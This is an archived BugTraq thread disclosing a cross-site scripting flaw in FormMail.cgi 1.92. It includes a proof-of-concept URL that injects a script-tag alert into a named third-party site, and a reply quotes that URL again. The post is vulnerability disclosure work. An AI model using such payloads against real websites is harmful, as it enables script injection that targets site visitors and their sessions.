BugTraq
Back to list
|
Post reply
XSS (Cross Site Scripting) on FormMail.CGI
Jan 11 2003 04:50PM
Rynho Zeros Web (hackargentino gmx net)
(1 replies)
#############################################################
Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html
By XyborG - xyborg (at) bigfoot (dot) com [email concealed] - http://www.rzweb.com.ar/
#############################################################
Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.
The operation is simple. To see example:
http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorr
y,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n\nCyervo_Lamos...");</scri
pt>
Duh!
#############################################################
Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html
By XyborG - xyborg (at) bigfoot (dot) com [email concealed] - http://www.rzweb.com.ar/
#############################################################
--
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!
[ reply ]
Re: XSS (Cross Site Scripting) on FormMail.CGI
Jan 21 2003 03:04AM
Scott Buchanan (scott buchanan axe net au)
Privacy Statement
Copyright 2010, SecurityFocus
Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html
By XyborG - xyborg (at) bigfoot (dot) com [email concealed] - http://www.rzweb.com.ar/
#############################################################
Formmai.cgi, it is a utility that serves to send forms by email, among other
uses.
The operation is simple. To see example:
http://www.l-c-u.com.ar/cgi-sys/FormMail.cgi?<script>alert("<center>Sorr
y,this\nis\nthe\nsecurity\nsite?\nNo_lo_Creo\n\nCyervo_Lamos...");</scri
pt>
Duh!
#############################################################
Topic: XSS (Cross Site Scripting) on FormMail.CGI
Version: 1.92
Released: April 21, 2002
Manufacturer: http://www.scriptarchive.com/formmail.html
By XyborG - xyborg (at) bigfoot (dot) com [email concealed] - http://www.rzweb.com.ar/
#############################################################
--
XyBØrG
WebMaster de:
www.RZW.com.ar
Powered By Dattatec.Com
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!
[ reply ]